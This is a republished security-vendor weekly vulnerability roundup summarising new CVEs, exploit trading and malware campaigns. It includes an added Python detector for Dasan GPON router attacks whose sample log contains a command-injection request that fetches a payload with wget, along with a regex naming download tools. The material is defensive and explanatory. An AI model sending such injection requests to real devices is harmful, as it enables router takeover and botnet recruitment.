The Week in Vulnerabilities: 717 New Cybersecurity Flaws Reported!
Cyble reports that 717 new vulnerabilities were identified between July 30 and August 5, 2025, of which 222 have public PoC exploits and 17 affect products that are no longer supported. These vulnerabilities raise the risk of cyberattacks, and exploits targeting them are being actively traded on underground forums. Published: 2025-08-11 12:00:48  Author: cyble.com

Cyble found 717 new vulnerabilities, including 222 with PoCs and 17 in EOL products, exposing systems to growing cyberattack risks.

In the latest weekly vulnerability insights to clients, Cyble Research & Intelligence Labs has spotlighted a concerning surge in security weaknesses affecting a broad spectrum of digital products and services. From July 30 to August 5, 2025, Cyble’s vulnerability intelligence module tracked 717 new vulnerabilities.  

Among these, 222 ship with publicly available Proof-of-Concept (PoC) exploit code, which raises the likelihood of near-term exploitation and shrinks the window defenders have to patch or mitigate. 

End-of-Life Products Pose Persistent Threats 

A particularly worrisome finding from Cyble’s report is the identification of 17 vulnerabilities in products that have reached end-of-life (EOL). The affected products include PHP Charts, Glossword, Kordil, and the WP-Property WordPress plugin, along with network devices from Linksys, Netgear, and D-Link.  

Because EOL products no longer receive security updates, these vulnerabilities are soft targets: an attacker can exploit them indefinitely with no fix ever forthcoming, and the only remediation available to the owner is to isolate or replace the product. 

Zero-Day Vulnerability and Underground Exploit Trading 

The report also uncovered one zero-day vulnerability disclosed during this week. Cyble’s vulnerability intelligence team continuously monitors not only surface web disclosures but also underground cybercrime forums.  

This week, five vulnerabilities were actively discussed and traded among threat actors in these clandestine communities, demonstrating the rapid commercial circulation of exploit code. 

In addition, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) expanded its Known Exploited Vulnerabilities (KEV) catalog by adding three new D-Link device vulnerabilities that are currently being exploited in the wild.  

These flaws jeopardize network security by allowing attackers to gain unauthorized access to devices. 

Major Vendors and Critical Vulnerabilities in Focus 

During this reporting period, Apple, Code Projects, Dell, Portabilis, and Anisha topped the list of vendors with newly disclosed vulnerabilities, indicating widespread exposure across diverse technological ecosystems, including enterprise platforms and embedded systems. 

Out of the total vulnerabilities tracked, 114 received critical ratings based on CVSS v3.1 standards, with an additional 39 deemed critical under the newer CVSS v4.0 framework. High-profile critical flaws include: 

  • CVE-2025-54948 and CVE-2025-54987: These remote code execution (RCE) vulnerabilities in Trend Micro Apex One’s on-premise management console permit attackers to upload and execute malicious code without authentication. Successful exploitation could result in complete system compromise. 
  • CVE-2014-125113: A critical unrestricted file upload vulnerability in Dell’s KACE K1000 Systems Management Appliance that also carries a high risk of remote code execution. Note the 2014 identifier: this is a long-known flaw, not a new one, so any K1000 still reachable from the network should be considered exposed. 

Such vulnerabilities drastically reduce the effort required for attackers to take control of systems, potentially exposing sensitive data and operational infrastructure. 

Trending Vulnerabilities in Enterprise and Open-Source Software 

Several vulnerabilities have been trending heavily in both open-source communities and underground forums due to their severity and exploitability: 

  • CVE-2025-53770: A deserialization flaw in Microsoft SharePoint Server enables unauthenticated remote code execution. This vulnerability has been actively exploited in persistent enterprise intrusions. 
  • CVE-2025-54253: An authentication bypass in Adobe Experience Manager (AEM) Forms allows attackers to execute remote code. 
  • CVE-2025-40599: A vulnerability in SonicWall SMA 100 series appliances that allows authenticated arbitrary file uploads, risking full device takeover. 
  • CVE-2025-6558: A critical input validation bug impacting Google Chrome’s ANGLE and Apple’s WebKit browser engine threatens millions of users with potential remote attacks. 

Exploit Activity on Cybercrime Forums 

Cyble Research & Intelligence Labs (CRIL) identified cybercriminal activity trading exploits for critical vulnerabilities, including: 

  • NVIDIA Container Toolkit container escape vulnerability (CVE-2025-23266), which grants root access in AI and cloud environments. 
  • An unauthenticated remote code execution vulnerability in the Pterodactyl game server management software (CVE-2025-49132). 

A notable zero-day exploit dubbed SMBGhost, targeting the SMB protocol for remote code execution on Windows 10, Windows 11, and Windows Server 2019 through 2025, was also offered on an underground forum. The threat actor claimed to have tested the exploit but did not list a price. One caveat for defenders: "SMBGhost" is the name already attached to CVE-2020-0796, an SMBv3 compression bug patched in March 2020, so a forum listing reusing that name for a supposed zero-day should be treated with skepticism until a sample is analyzed. 

Another cybercriminal discussed a critical RCE vulnerability in Synology TC500 IP cameras running firmware 1.1.2-0416, involving a format string bug in a web service that handles HTTP requests. A format string bug gives the attacker both a read primitive (to leak addresses) and a write primitive, which is why the flaw allowed arbitrary memory writes even with mitigations such as ASLR and PIE in place. Synology patched it in firmware version 1.1.3-0442. 

Cyble’s Threat Hunting Service, Vulnerability Intelligence, and Sensor Intelligence 

Cyble’s Threat Hunting Service plays a crucial role in capturing real-time cyberattack intelligence globally through an extensive network of honeypots and advanced analytic tools. This proactive strategy enables Cyble to detect exploit attempts, malware infections, phishing campaigns, and brute force attacks as they unfold. 

Sensor Intelligence Reports provide deep dives into attacks involving prominent malware families like CoinMiner Linux, WannaCry ransomware, Linux Mirai botnet, and IRCBot, demonstrating evolving attacker techniques.  

The reports also detail phishing campaigns, identifying key targeted regions, exploited network ports, and source IP infrastructure, delivering critical Indicators of Compromise (IoCs) for rapid defense. 

IoT and Linux Systems Under Attack 

The report highlights ongoing threats to Internet of Things (IoT) devices and Linux systems, with malware families Mirai and Gafgyt continuing to exploit unpatched devices. Additionally, Cyble’s sensors have detected exploitation attempts against Telerik UI and Cisco Adaptive Security Appliance (ASA) components. 

Selected vulnerabilities of interest include: 

  • CVE-2025-34031: The Moodle LMS Jmol plugin suffers from an unauthenticated path traversal bug that allows access to sensitive server files, including database credentials. 
  • CVE-2025-32814: Infoblox NETMRI’s SQL injection flaw allows unauthenticated attackers to manipulate backend databases. 
  • CVE-2025-31161: CrushFTP authentication bypass through a race condition, enabling attackers to assume admin privileges. 
  • CVE-2024-36401: OSGeo GeoServer remote code execution via unsafe OGC request parameter evaluation. 
  • CVE-2024-29269: Command injection in Telesquare TLR-2005Ksh devices allows arbitrary system command execution. 

Other significant vulnerabilities include SQL injections, SSRF exposures, and multiple critical issues affecting D-Link NAS devices, some of which allow the disclosure of sensitive information or the use of hardcoded credentials. 

Emerging Attack Patterns: Cisco ASA and QNAP Devices 

Cyble’s sensors continue to detect scanning and exploitation attempts against Cisco ASA WebVPN login interfaces, vulnerable to cross-site scripting, path traversal, and HTTP response splitting attacks. QNAP QTS firmware also faces multiple command injection vulnerabilities that threaten millions of NAS devices globally. 

Meanwhile, the Mirai botnet variant actively targets Dasan GPON routers by exploiting two well-known 2018 vulnerabilities: CVE-2018-10561, an authentication bypass, and CVE-2018-10562, an unauthenticated command injection. Chained together they give the botnet code execution on the router, which it then uses for large-scale DDoS attacks. 
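As an added example (not part of Cyble's report or its sensor tooling), the script below scans web-server access logs for the request shapes that public analyses of the two GPON bugs described: a query string beginning with `images/`, which the affected firmware treated as an authenticated static-file request (CVE-2018-10561), and requests to the `/GponForm/diag_Form` diagnostic endpoint whose `dest_host` parameter reached a shell (CVE-2018-10562). The log lines are constructed, the indicator strings are assumed to still match what scanners send, and the body of a POST (where `dest_host` normally travels) is not present in common-log-format records, so the injection check only fires when the parameter is visible in the request line.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache/nginx common log format (CLF); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Aug/2025:10:01:12 +0000] "GET /index.html HTTP/1.1" 200 512
198.51.100.4 - - [05/Aug/2025:10:05:41 +0000] "GET /images/logo.png HTTP/1.1" 200 3021
203.0.113.9 - - [05/Aug/2025:10:02:03 +0000] "GET /menu.html?images/ HTTP/1.1" 200 1884
203.0.113.9 - - [05/Aug/2025:10:02:04 +0000] "POST /GponForm/diag_Form?images/ HTTP/1.1" 200 93
203.0.113.9 - - [05/Aug/2025:10:02:05 +0000] "GET /GponForm/diag_Form?images/&dest_host=`wget+http://203.0.113.9/m`&user=admin HTTP/1.1" 200 93
"""

CLF_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Indicators as described in public write-ups of the 2018 Dasan GPON bugs.
# Assumption: scanners and Mirai variants still send these exact forms; tune to your telemetry.
BYPASS_QUERY = "images/"            # CVE-2018-10561: query string starting with "images/" skipped the login check
DIAG_PATH = "/GponForm/diag_Form"   # CVE-2018-10562: diagnostic form whose dest_host value reached a shell
SHELL_META = re.compile(r"[;`|$]|\b(?:wget|curl|busybox|tftp)\b", re.IGNORECASE)

def classify_request(line: str) -> Optional[Dict[str, object]]:
    """Return a finding record for one CLF line, or None if it carries no GPON indicator."""
    m = CLF_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    findings: List[str] = []
    if parts.query.startswith(BYPASS_QUERY):
        findings.append("auth-bypass-marker")
    if parts.path == DIAG_PATH:
        findings.append("diag-endpoint")
        # Only the dest_host value is inspected, so '&' separators in the query do not trigger it.
        for value in parse_qs(parts.query, keep_blank_values=True).get("dest_host", []):
            if SHELL_META.search(value):
                findings.append("command-injection-attempt")
                break
    if not findings:
        return None
    return {"src": m["src"], "ts": m["ts"], "method": m["method"],
            "target": m["target"], "status": int(m["status"]), "findings": findings}

def scan_log(text: str) -> List[Dict[str, object]]:
    """Run classify_request over every line and keep the hits, in log order."""
    hits: List[Dict[str, object]] = []
    for line in text.splitlines():
        rec = classify_request(line)
        if rec:
            hits.append(rec)
    return hits

def sources_to_block(text: str) -> Dict[str, int]:
    """Count hits per source address; candidates for a blocklist or a threat-intel lookup."""
    counts: Dict[str, int] = {}
    for rec in scan_log(text):
        src = str(rec["src"])
        counts[src] = counts.get(src, 0) + 1
    return counts

if __name__ == "__main__":
    for rec in scan_log(SAMPLE_LOG):
        print(rec["src"], rec["method"], rec["target"], ",".join(rec["findings"]))
    print(sources_to_block(SAMPLE_LOG))
```

The benign `/images/logo.png` request is not flagged because the indicator is the query string, not the path; the three requests from 203.0.113.9 escalate from probe, to endpoint access, to a visible injection attempt, which is the sequence to alert on.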

Financial Sector Malware Campaigns 

One particularly notable malware campaign targets Bengali-speaking users through fake remittance apps designed to steal banking credentials and payment card data. The malware uses a two-stage payload, with the second stage XOR-encrypted to evade static detection. Victims are shown counterfeit banking interfaces while data is exfiltrated quietly. 

The campaign also deploys covertly operated Monero cryptocurrency miners, activated remotely via Firebase Cloud Messaging during low device activity, using RandomX-optimized mining software compatible with mobile CPUs. This multifaceted attack demonstrates the growing complexity of mobile-targeted financial threats. 

Malware and Phishing Threats Persist 

Cyble’s sensors continue to track several high-profile malware families: 

  • CoinMiner Linux silently mines cryptocurrency by consuming system resources. 
  • WannaCry ransomware still attempts propagation through EternalBlue exploits. 
  • Linux Mirai and IRCBot remain active, infecting IoT devices and Linux servers for botnet operations. 

Phishing remains a prevalent threat vector, with attackers using impersonation, spoofed email addresses, and social engineering tactics such as urgency and fake compensation claims to extract sensitive information or money from victims. Cyble identified over 52,900 new phishing-related email addresses this week alone, documenting them as Indicators of Compromise for defenders. 

Conclusion 

This week’s vulnerability report highlights the growing challenge security teams face in keeping up with a high volume of exploitable flaws alongside active threats targeting IoT, enterprise systems, and critical infrastructure. 

To stay protected from such threats, organizations must adopt a risk-based vulnerability management approach, implement Zero-Trust principles, harden configurations, and maintain strong monitoring and incident response capabilities. 

Cyble vulnerability intelligence empowers defenders with real-time threat visibility, exploit tracking, and early warnings from dark web sources. Get a free external threat profile today to assess your exposure and strengthen your defenses. 


Source: https://cyble.com/blog/cyble-vulnerability-intelligence/
For copyright concerns contact: admin#unsafe.sh